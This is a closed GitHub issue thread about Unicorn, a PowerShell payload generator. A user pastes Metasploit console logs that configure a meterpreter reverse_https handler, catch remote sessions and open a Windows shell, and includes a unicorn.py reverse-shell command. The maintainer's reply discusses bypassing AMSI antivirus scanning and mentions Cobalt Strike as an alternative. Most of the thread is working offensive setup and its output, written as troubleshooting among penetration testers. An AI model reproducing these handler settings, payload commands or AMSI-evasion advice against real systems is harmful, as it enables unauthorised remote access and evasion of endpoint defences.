Closed myexploit closed 5 years ago
Thanks! This is expected because if you load stdapi as part of the initial stager, in my testing it would kill the shell. The problem is there are a lot of hardcoded things inside of MSF and unfortunately it's a cat/mouse game on that front. While Unicorn bypasses AMSI - the shellcode loaders in MSF are problematic. Custom C2 would be fine, or Cobalt Strike as an example.
That makes sense I will try CS tomorrow, Cheers for quick reply.
Nice work on the update by the way, AMSI seems to spot the "PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443" example but I’m getting shells, and that keeps me happy.
I have spotted that if you include AutoLoadStdapi false in your MSF handler script as is now included in unicorn.rc you don’t seem to be able to use most of Meterpreter functions.
I just spotted it while testing the update.
Below is my testing
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf5 exploit(multi/handler) > set LHOST 192.168.1.29 LHOST => 192.168.1.29 msf5 exploit(multi/handler) > set LPORT 443 LPORT => 443 msf5 exploit(multi/handler) > set ExitOnSession false ExitOnSession => false msf5 exploit(multi/handler) > set AutoVerifySession false AutoVerifySession => false msf5 exploit(multi/handler) > set AutoSystemInfo false AutoSystemInfo => false msf5 exploit(multi/handler) > set AutoLoadStdapi false AutoLoadStdapi => false msf5 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0. [] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [] Started HTTPS reverse handler on https://192.168.1.29:443 [] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
msf5 exploit(multi/handler) > [] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49215) at 2019-05-16 17:06:44 +0100 msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > [] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session... [*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49216) at 2019-05-16 17:06:45 +0100
msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2...
meterpreter > shell [-] Unknown command: shell. meterpreter > background
Retrying without the “set AutoLoadStdapi false” switch.
msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf5 exploit(multi/handler) > set LHOST 192.168.1.29 LHOST => 192.168.1.29 msf5 exploit(multi/handler) > set LPORT 443 LPORT => 443 msf5 exploit(multi/handler) > exploit -j
[] Exploit running as background job 0. [] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [] Started HTTPS reverse handler on https://192.168.1.29:443 [] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session... [] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49238) at 2019-05-16 17:08:01 +0100 [] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session... [*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49239) at 2019-05-16 17:08:03 +0100
msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...
meterpreter > shell Process 3948 created. Channel 2 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.